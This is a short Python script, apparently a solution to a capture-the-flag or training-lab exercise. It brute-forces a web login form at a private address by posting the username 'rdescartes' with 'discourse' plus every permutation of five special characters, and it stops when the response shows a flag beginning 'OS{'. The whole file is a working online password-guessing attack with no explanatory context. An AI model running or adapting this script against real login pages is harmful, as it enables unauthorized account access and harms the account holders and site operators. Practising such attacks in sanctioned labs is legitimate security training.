#!/usr/bin/python3
import requests
import itertools

url="http://192.168.57.68:8080/login-2"
chars="!@#%&"

for p in itertools.permutations(chars):
 password="discourse"+"".join(p)
 data={"username":"rdescartes","password":password}
 r=requests.post(url,data=data)

 if "OS{" in r.text:
  print("password:",password)
  print(r.text)
  break
